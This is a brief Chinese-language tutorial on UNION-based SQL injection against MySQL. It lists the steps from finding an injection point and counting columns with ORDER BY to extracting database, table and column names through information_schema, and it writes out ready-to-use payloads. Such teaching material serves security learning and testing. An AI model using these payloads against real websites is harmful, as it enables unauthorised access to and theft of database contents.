sql注入之union注入

聯合查詢注入利用的前提: 必需要有回顯

聯合查詢過程:

  1. 判斷是否存在注入點
  2. 判斷是什麼類型注入(字符型or數字型)
  3. 判斷閉合方式
  4. 查詢列數個數(order by)
    5, 得到數據庫名
  5. 得到表名
  6. 得到字段名

1. 判斷是否存在注入點 能夠用(')單引號顯示數據庫錯誤信息或者頁面回顯不一樣
2. 判斷什麼類型(字符型or數字型) 用and 1=1和and 1=2  若是頁面沒有變化說明不是數字型 ,若是有明顯變化說明是數字型
3. 判斷閉合方式 單引號or雙引號..看報錯信息、
4. 判斷列數個數(order by) order by在mysql中查詢結果是按照指定字段進行排序的,例如數據庫中有3個字段,order by查詢就是1,2,3
5. 查看數據庫信息and得到數據庫名 使用group_concat() 
	基本語句:
    
    1' union select 1,(select database()),3--+

    1' union select 1,(select group_concat(schema_name) from information_schema.schemata) --+




6. 得到表名
	基本語句:

    0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+





7. 得到字段名
	基本語句:

    0' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='表名'),3 --+
相關文章
相關標籤/搜索